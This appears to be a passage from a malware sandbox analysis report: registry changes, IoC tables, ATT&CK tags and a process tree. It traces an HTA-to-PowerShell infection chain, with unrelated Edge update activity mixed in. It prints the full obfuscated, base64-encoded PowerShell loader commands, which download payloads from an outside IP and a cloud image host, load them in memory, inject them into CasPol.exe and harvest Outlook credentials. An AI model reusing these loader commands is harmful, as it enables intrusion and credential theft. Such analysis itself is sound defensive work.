Key created	\REGISTRY\USER\S-1-5-21-2656314083-4170277356-267438488-1000_Classes\Local Settings	powershell.exe
Key created	\REGISTRY\MACHINE\Software\Classes\CLSID\{628ACE20-B77A-456F-A88D-547DB6CEEDD5}\LocalServer32	setup.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\ie_to_edge_bho.IEToEdgeBHO\	setup.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\ie_to_edge_bho.IEToEdgeBHO\ = "IEToEdgeBHO Class"	setup.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\MSEdgeMHT\Application\ApplicationIcon = "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\133.0.3065.59\\msedge.exe,0"	setup.exe
Key created	\REGISTRY\MACHINE\Software\Classes\.pdf	setup.exe
Key created	\REGISTRY\MACHINE\Software\Classes\TypeLib\{C9C2B807-7731-4F34-81B7-44FF7779522B}	setup.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4A749F25-A9E2-4CBE-9859-CF7B15255E14}\LocalServer32\ = "\"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\133.0.3065.59\\notification_click_helper.exe\""	setup.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\MSEdgePDF\ = "Microsoft Edge PDF Document"	setup.exe
Key created	\REGISTRY\MACHINE\Software\Classes\MSEdgePDF\shell	setup.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\MSEdgePDF\Application\ApplicationCompany = "Microsoft Corporation"	setup.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\MSEdgeMHT\shell\runas\command\ = "\"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe\" --do-not-de-elevate --single-argument %1"	setup.exe
Key created	\REGISTRY\MACHINE\Software\Classes\.mht	setup.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1FCBE96C-1697-43AF-9140-2897C7C69767}\AppID = "{1FCBE96C-1697-43AF-9140-2897C7C69767}"	setup.exe

Suspicious behavior: EnumeratesProcesses 18 IoCs

pid	Process
4448	powershell.exe
4448	powershell.exe
992	powershell.exe
992	powershell.exe
5116	CasPol.exe
5116	CasPol.exe
3212	CasPol.exe
3212	CasPol.exe
5116	CasPol.exe
5116	CasPol.exe
4268	setup.exe
4268	setup.exe
3144	LocalBridge.exe
3144	LocalBridge.exe
3144	LocalBridge.exe
3144	LocalBridge.exe
3144	LocalBridge.exe
3144	LocalBridge.exe

Suspicious behavior: MapViewOfSection 6 IoCs

pid	Process
3332	CasPol.exe
3332	CasPol.exe
3332	CasPol.exe
3332	CasPol.exe
3332	CasPol.exe
3332	CasPol.exe

Suspicious use of AdjustPrivilegeToken 7 IoCs

description	pid	Process
Token: SeDebugPrivilege	4448	powershell.exe
Token: SeDebugPrivilege	992	powershell.exe
Token: SeDebugPrivilege	3212	CasPol.exe
Token: 33	4720	setup.exe
Token: SeIncBasePriorityPrivilege	4720	setup.exe
Token: SeDebugPrivilege	5100	wwahost.exe
Token: SeDebugPrivilege	5100	wwahost.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
5100	wwahost.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 856 wrote to memory of 3080	856	mshta.exe	88
PID 856 wrote to memory of 3080	856	mshta.exe	88
PID 856 wrote to memory of 3080	856	mshta.exe	88
PID 3080 wrote to memory of 4448	3080	cmd.exe	90
PID 3080 wrote to memory of 4448	3080	cmd.exe	90
PID 3080 wrote to memory of 4448	3080	cmd.exe	90
PID 4448 wrote to memory of 2396	4448	powershell.exe	92
PID 4448 wrote to memory of 2396	4448	powershell.exe	92
PID 4448 wrote to memory of 2396	4448	powershell.exe	92
PID 2396 wrote to memory of 3100	2396	csc.exe	93
PID 2396 wrote to memory of 3100	2396	csc.exe	93
PID 2396 wrote to memory of 3100	2396	csc.exe	93
PID 4448 wrote to memory of 4572	4448	powershell.exe	94
PID 4448 wrote to memory of 4572	4448	powershell.exe	94
PID 4448 wrote to memory of 4572	4448	powershell.exe	94
PID 4572 wrote to memory of 992	4572	WScript.exe	95
PID 4572 wrote to memory of 992	4572	WScript.exe	95
PID 4572 wrote to memory of 992	4572	WScript.exe	95
PID 992 wrote to memory of 3332	992	powershell.exe	100
PID 992 wrote to memory of 3332	992	powershell.exe	100
PID 992 wrote to memory of 3332	992	powershell.exe	100
PID 992 wrote to memory of 3332	992	powershell.exe	100
PID 992 wrote to memory of 3332	992	powershell.exe	100
PID 992 wrote to memory of 3332	992	powershell.exe	100
PID 992 wrote to memory of 3332	992	powershell.exe	100
PID 992 wrote to memory of 3332	992	powershell.exe	100
PID 992 wrote to memory of 3332	992	powershell.exe	100
PID 992 wrote to memory of 3332	992	powershell.exe	100
PID 3332 wrote to memory of 3756	3332	CasPol.exe	103
PID 3332 wrote to memory of 3756	3332	CasPol.exe	103
PID 3332 wrote to memory of 3756	3332	CasPol.exe	103
PID 3332 wrote to memory of 1180	3332	CasPol.exe	104
PID 3332 wrote to memory of 1180	3332	CasPol.exe	104
PID 3332 wrote to memory of 1180	3332	CasPol.exe	104
PID 3332 wrote to memory of 5116	3332	CasPol.exe	105
PID 3332 wrote to memory of 5116	3332	CasPol.exe	105
PID 3332 wrote to memory of 5116	3332	CasPol.exe	105
PID 3332 wrote to memory of 5116	3332	CasPol.exe	105
PID 3332 wrote to memory of 864	3332	CasPol.exe	106
PID 3332 wrote to memory of 864	3332	CasPol.exe	106
PID 3332 wrote to memory of 864	3332	CasPol.exe	106
PID 3332 wrote to memory of 4472	3332	CasPol.exe	107
PID 3332 wrote to memory of 4472	3332	CasPol.exe	107
PID 3332 wrote to memory of 4472	3332	CasPol.exe	107
PID 3332 wrote to memory of 4472	3332	CasPol.exe	107
PID 3332 wrote to memory of 3212	3332	CasPol.exe	108
PID 3332 wrote to memory of 3212	3332	CasPol.exe	108
PID 3332 wrote to memory of 3212	3332	CasPol.exe	108
PID 3332 wrote to memory of 3212	3332	CasPol.exe	108
PID 4944 wrote to memory of 4720	4944	MicrosoftEdge_X64_133.0.3065.59.exe	111
PID 4944 wrote to memory of 4720	4944	MicrosoftEdge_X64_133.0.3065.59.exe	111
PID 4720 wrote to memory of 3968	4720	setup.exe	112
PID 4720 wrote to memory of 3968	4720	setup.exe	112
PID 4720 wrote to memory of 1204	4720	setup.exe	113
PID 4720 wrote to memory of 1204	4720	setup.exe	113
PID 1204 wrote to memory of 712	1204	setup.exe	114
PID 1204 wrote to memory of 712	1204	setup.exe	114
PID 4720 wrote to memory of 4268	4720	setup.exe	115
PID 4720 wrote to memory of 4268	4720	setup.exe	115
PID 4720 wrote to memory of 2452	4720	setup.exe	116
PID 4720 wrote to memory of 2452	4720	setup.exe	116
PID 4720 wrote to memory of 5020	4720	setup.exe	117
PID 4720 wrote to memory of 5020	4720	setup.exe	117
PID 4268 wrote to memory of 2212	4268	setup.exe	119

System policy modification 1 TTPs 4 IoCs

defense_evasion

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Ext\CLSID	setup.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Ext\CLSID\{1FD49718-1D00-4B19-AF5F-070AF6D5D54C} = "1"	setup.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Ext	setup.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Ext\CLSID\	setup.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\createdbestthingswithbetterwaysgivemebestfor.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:856
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" "/c pOWeRSheLL -ex bYPasS -NoP -w 1 -C deVICeCredentiaLdeplOyMENT ; IeX($(IEx('[sYsTem.TeXT.encoDINg]'+[cHaR]58+[chAR]0x3A+'UTF8.gETStRing([SYSTeM.CoNvErT]'+[CHAr]0X3A+[cHAR]0x3a+'FROmBASE64stRInG('+[chAR]34+'JFNaICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkRC1UWXBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FbUJFckRFZkluaVRJb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsTU9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYlBydSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBOcmRUZSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBIaUJGYSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc29PUUxWUllHLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE9lUUJTVnUpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJHWXBrVlciICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbUVzUEFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGxXYkdnVmtnV1QgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFNaOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vNjYuMTc5LjIxMC4xOS83OC9jcmVhdGVkYmVzdHRoaW5nc3dpdGhiZXR0ZXJ3YXlzZ2l2ZW1lYmVzdGZvci5nSUYiLCIkZW5WOkFQUERBVEFcY3JlYXRlZGJlc3R0aGluZ3N3aXRoYmV0dGVyd2F5c2dpdmVtZWJlc3Rmby52YnMiLDAsMCk7U3RBclQtU0xlRXAoMyk7SU5WT0tFLUl0ZU0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVOVjpBUFBEQVRBXGNyZWF0ZWRiZXN0dGhpbmdzd2l0aGJldHRlcndheXNnaXZlbWViZXN0Zm8udmJzIg=='+[CHAR]0X22+'))')))"
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:3080
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    pOWeRSheLL -ex bYPasS -NoP -w 1 -C deVICeCredentiaLdeplOyMENT ; IeX($(IEx('[sYsTem.TeXT.encoDINg]'+[cHaR]58+[chAR]0x3A+'UTF8.gETStRing([SYSTeM.CoNvErT]'+[CHAr]0X3A+[cHAR]0x3a+'FROmBASE64stRInG('+[chAR]34+'JFNaICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkRC1UWXBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FbUJFckRFZkluaVRJb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsTU9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYlBydSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBOcmRUZSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBIaUJGYSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc29PUUxWUllHLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE9lUUJTVnUpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJHWXBrVlciICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbUVzUEFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGxXYkdnVmtnV1QgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFNaOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vNjYuMTc5LjIxMC4xOS83OC9jcmVhdGVkYmVzdHRoaW5nc3dpdGhiZXR0ZXJ3YXlzZ2l2ZW1lYmVzdGZvci5nSUYiLCIkZW5WOkFQUERBVEFcY3JlYXRlZGJlc3R0aGluZ3N3aXRoYmV0dGVyd2F5c2dpdmVtZWJlc3Rmby52YnMiLDAsMCk7U3RBclQtU0xlRXAoMyk7SU5WT0tFLUl0ZU0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVOVjpBUFBEQVRBXGNyZWF0ZWRiZXN0dGhpbmdzd2l0aGJldHRlcndheXNnaXZlbWViZXN0Zm8udmJzIg=='+[CHAR]0X22+'))')))"
    3⤵
    - Blocklisted process makes network request
    - Evasion via Device Credential Deployment
    - System Location Discovery: System Language Discovery
    - Modifies registry class
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:4448
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\qqlrwif0\qqlrwif0.cmdline"
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:2396
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA0A5.tmp" "c:\Users\Admin\AppData\Local\Temp\qqlrwif0\CSC49355F2AA318489891652470AC212173.TMP"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:3100
  - - C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\createdbestthingswithbetterwaysgivemebestfo.vbs"
      4⤵
      Checks computer location settings
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:4572
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command "[System.Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('JABtAG8AdgBpAGUAZwBvAGUAcgBzACAAPQAgACcAdAB4AHQALgByAG8AZgB0AHMAZQBiAGUAbQBlAHYAaQBnAHMAeQBhAHcAcgBlAHQAdABlAGIAaAB0AGkAdwBzAGcAbgBpAGgAdAB0AHMAZQBiAGQAZQB0AGEAZQByAGMALwA4ADcALwA5ADEALgAwADEAMgAuADkANwAxAC4ANgA2AC8ALwA6AHAAdAB0AGgAJwA7ACQAcgBhAGkAbgBvAHUAdABzACAAPQAgACQAbQBvAHYAaQBlAGcAbwBlAHIAcwAgAC0AcgBlAHAAbABhAGMAZQAgACcAIwAnACwAIAAnAHQAJwA7ACQAaQBzAG8AYwBoAHIAbwBtAG8AcwBvAG0AZQBzACAAPQAgACcAaAB0AHQAcABzADoALwAvAHIAZQBzAC4AYwBsAG8AdQBkAGkAbgBhAHIAeQAuAGMAbwBtAC8AZABvAHcAMgBzAGYAZgBzADcALwBpAG0AYQBnAGUALwB1AHAAbABvAGEAZAAvAHYAMQA3ADMAOQAzADQAMwA0ADEAMgAvAGQAdQBsAHgAawByAHUAbwBlAGUAcAAxAGkAdAB6ADcAbAB0ADYAYgAuAGoAcABnACcAOwAkAHAAYQBjAGgAeQBkAG8AbQB1AHMAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQAZwByAGEAbgB1AGwAYQB0AGkAbgBnACAAPQAgACQAcABhAGMAaAB5AGQAbwBtAHUAcwAuAEQAbwB3AG4AbABvAGEAZABEAGEAdABhACgAJABpAHMAbwBjAGgAcgBvAG0AbwBzAG8AbQBlAHMAKQA7ACQAdABhAHIAZAB5AG8AbgBzACAAPQAgAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAZwByAGEAbgB1AGwAYQB0AGkAbgBnACkAOwAkAGEAcgBjAGgAZQB0AHkAcABhAGwAbAB5ACAAPQAgACcAPAA8AEIAQQBTAEUANgA0AF8AUwBUAEEAUgBUAD4APgAnADsAJAByAGEAZABnAGUAIAA9ACAAJwA8ADwAQgBBAFMARQA2ADQAXwBFAE4ARAA+AD4AJwA7ACQAcwB1AGwAZgBhAG0AYQB0AGUAIAA9ACAAJAB0AGEAcgBkAHkAbwBuAHMALgBJAG4AZABlAHgATwBmACgAJABhAHIAYwBoAGUAdAB5AHAAYQBsAGwAeQApADsAJABhAGwAYgBhAG4AIAA9ACAAJAB0AGEAcgBkAHkAbwBuAHMALgBJAG4AZABlAHgATwBmACgAJAByAGEAZABnAGUAKQA7ACQAcwB1AGwAZgBhAG0AYQB0AGUAIAAtAGcAZQAgADAAIAAtAGEAbgBkACAAJABhAGwAYgBhAG4AIAAtAGcAdAAgACQAcwB1AGwAZgBhAG0AYQB0AGUAOwAkAHMAdQBsAGYAYQBtAGEAdABlACAAKwA9ACAAJABhAHIAYwBoAGUAdAB5AHAAYQBsAGwAeQAuAEwAZQBuAGcAdABoADsAJABTAGgAbwB3AHQAYQByAG8AIAA9ACAAJABhAGwAYgBhAG4AIAAtACAAJABzAHUAbABmAGEAbQBhAHQAZQA7ACQAbQBlAHQAaAB5AGwAZQBuAGEAdABpAG8AbgAgAD0AIAAkAHQAYQByAGQAeQBvAG4AcwAuAFMAdQBiAHMAdAByAGkAbgBnACgAJABzAHUAbABmAGEAbQBhAHQAZQAsACAAJABTAGgAbwB3AHQAYQByAG8AKQA7ACQAdABlAHIAYwBlAGwAcwAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABtAGUAdABoAHkAbABlAG4AYQB0AGkAbwBuACkAOwAkAHYAbwB4AGUAbABhAHQAZQBzACAAPQAgAFsAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKAAkAHQAZQByAGMAZQBsAHMAKQA7ACQATABhAG4AZABzAHQAZQBpAG4AZQByACAAPQAgAFsAZABuAGwAaQBiAC4ASQBPAC4ASABvAG0AZQBdAC4ARwBlAHQATQBlAHQAaABvAGQAKAAnAFYAQQBJACcAKQAuAEkAbgB2AG8AawBlACgAJABuAHUAbABsACwAIABbAG8AYgBqAGUAYwB0AFsAXQBdACAAQAAoACQAcgBhAGkAbgBvAHUAdABzACwAJwAnACwAJwAnACwAJwAnACwAJwBDAGEAcwBQAG8AbAAnACwAJwAnACwAJwAnACwAJwAnACwAJwAnACwAJwAnACwAJwAnACwAJwAnACwAJwAnACwAJwAnACwAJwAnACkAKQA=')) | Invoke-Expression"
        5⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:992
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
        6⤵
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        Suspicious behavior: MapViewOfSection
        Suspicious use of WriteProcessMemory
        
        PID:3332
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\Admin\AppData\Local\Temp\mhceftldaflmerr"
        7⤵
        
        PID:3756
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\Admin\AppData\Local\Temp\mhceftldaflmerr"
        7⤵
        
        PID:1180
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\Admin\AppData\Local\Temp\mhceftldaflmerr"
        7⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:5116
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\Admin\AppData\Local\Temp\xbixglwwoodrpfgazuw"
        7⤵
        
        PID:864
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\Admin\AppData\Local\Temp\xbixglwwoodrpfgazuw"
        7⤵
        Accesses Microsoft Outlook accounts
        System Location Discovery: System Language Discovery
        
        PID:4472
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\Admin\AppData\Local\Temp\zdvhhegycwvwrlceqejrfq"
        7⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3212

C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe
"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /ping PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48cmVxdWVzdCBwcm90b2NvbD0iMy4wIiB1cGRhdGVyPSJPbWFoYSIgdXBkYXRlcnZlcnNpb249IjEuMy4xOTUuNDMiIHNoZWxsX3ZlcnNpb249IjEuMy4xOTUuNDMiIGlzbWFjaGluZT0iMSIgc2Vzc2lvbmlkPSJ7RUFBMDU2N0QtODJGMi00RkVFLUI0ODQtQTI1QjJFQzlEMTM3fSIgdXNlcmlkPSJ7MDYyMkUyMkUtMTg4QS00NUMxLTlBMUUtNDFFMDlCQzBCMEJDfSIgaW5zdGFsbHNvdXJjZT0ibGltaXRlZCIgcmVxdWVzdGlkPSJ7NkEzRTFBM0UtMTkzMS00QzQ5LTg0MEMtMjJBODU3OTRBQUU1fSIgZGVkdXA9ImNyIiBkb21haW5qb2luZWQ9IjAiPjxodyBsb2dpY2FsX2NwdXM9IjIiIHBoeXNtZW1vcnk9IjQiIGRpc2tfdHlwZT0iMiIgc3NlPSIxIiBzc2UyPSIxIiBzc2UzPSIxIiBzc3NlMz0iMSIgc3NlNDE9IjEiIHNzZTQyPSIxIiBhdng9IjEiLz48b3MgcGxhdGZvcm09IndpbiIgdmVyc2lvbj0iMTAuMC4xOTA0MS4xMjg4IiBzcD0iIiBhcmNoPSJ4NjQiIHByb2R1Y3RfdHlwZT0iNDgiIGlzX3dpcD0iMCIgaXNfaW5fbG9ja2Rvd25fbW9kZT0iMCIvPjxvZW0gcHJvZHVjdF9tYW51ZmFjdHVyZXI9IiIgcHJvZHVjdF9uYW1lPSIiLz48ZXhwIGV0YWc9IiZxdW90O0UreGJBejZZNnNVMTI4OWJTNnFsNFZSTGJramZCVUdUTUpzanJIcjQ0aUk9JnF1b3Q7Ii8-PGFwcCBhcHBpZD0iezhBNjlEMzQ1LUQ1NjQtNDYzYy1BRkYxLUE2OUQ5RTUzMEY5Nn0iIHZlcnNpb249IjEyMy4wLjYzMTIuMTIzIiBuZXh0dmVyc2lvbj0iIiBsYW5nPSJlbiIgYnJhbmQ9IkdHTFMiIGNsaWVudD0iIiBpbnN0YWxsYWdlPSIxIiBpbnN0YWxsZGF0ZXRpbWU9IjE3MzkyODM0MTAiIG9vYmVfaW5zdGFsbF90aW1lPSIxMzM4Mzc1NTUzNjg2NzAwMDAiPjxldmVudCBldmVudHR5cGU9IjMxIiBldmVudHJlc3VsdD0iMSIgZXJyb3Jjb2RlPSIwIiBleHRyYWNvZGUxPSIyMTc5ODYyIiBzeXN0ZW1fdXB0aW1lX3RpY2tzPSI0ODcxMTUxOTk2Ii8-PC9hcHA-PC9yZXF1ZXN0Pg
1⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
PID:1628

C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{8BA0EEE9-81BB-4BC3-AAAB-77915639AD5F}\MicrosoftEdge_X64_133.0.3065.59.exe
"C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{8BA0EEE9-81BB-4BC3-AAAB-77915639AD5F}\MicrosoftEdge_X64_133.0.3065.59.exe" --msedge --verbose-logging --do-not-launch-msedge --system-level --channel=stable
1⤵
- Suspicious use of WriteProcessMemory
PID:4944
- C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{8BA0EEE9-81BB-4BC3-AAAB-77915639AD5F}\EDGEMITMP_B1D6A.tmp\setup.exe
  "C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{8BA0EEE9-81BB-4BC3-AAAB-77915639AD5F}\EDGEMITMP_B1D6A.tmp\setup.exe" --install-archive="C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{8BA0EEE9-81BB-4BC3-AAAB-77915639AD5F}\MicrosoftEdge_X64_133.0.3065.59.exe" --msedge --verbose-logging --do-not-launch-msedge --system-level --channel=stable
  2⤵
  - Boot or Logon Autostart Execution: Active Setup
  - Executes dropped EXE
  - Installs/modifies Browser Helper Object
  - Drops file in Program Files directory
  - Modifies Internet Explorer settings
  - Modifies registry class
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  - System policy modification
  PID:4720
- - C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{8BA0EEE9-81BB-4BC3-AAAB-77915639AD5F}\EDGEMITMP_B1D6A.tmp\setup.exe
    "C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{8BA0EEE9-81BB-4BC3-AAAB-77915639AD5F}\EDGEMITMP_B1D6A.tmp\setup.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Program Files\MsEdgeCrashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.60 "--annotation=exe=C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{8BA0EEE9-81BB-4BC3-AAAB-77915639AD5F}\EDGEMITMP_B1D6A.tmp\setup.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.59 --initial-client-data=0x224,0x228,0x22c,0x200,0x230,0x7ff64d146a68,0x7ff64d146a74,0x7ff64d146a80
    3⤵
    - Executes dropped EXE
    - Drops file in Program Files directory
    PID:3968
- - C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{8BA0EEE9-81BB-4BC3-AAAB-77915639AD5F}\EDGEMITMP_B1D6A.tmp\setup.exe
    "C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{8BA0EEE9-81BB-4BC3-AAAB-77915639AD5F}\EDGEMITMP_B1D6A.tmp\setup.exe" --msedge --channel=stable --system-level --verbose-logging --create-shortcuts=2 --install-level=1
    3⤵
    - Executes dropped EXE
    - Drops file in System32 directory
    - Drops file in Program Files directory
    - Modifies data under HKEY_USERS
    - Suspicious use of WriteProcessMemory
    PID:1204
  - - C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{8BA0EEE9-81BB-4BC3-AAAB-77915639AD5F}\EDGEMITMP_B1D6A.tmp\setup.exe
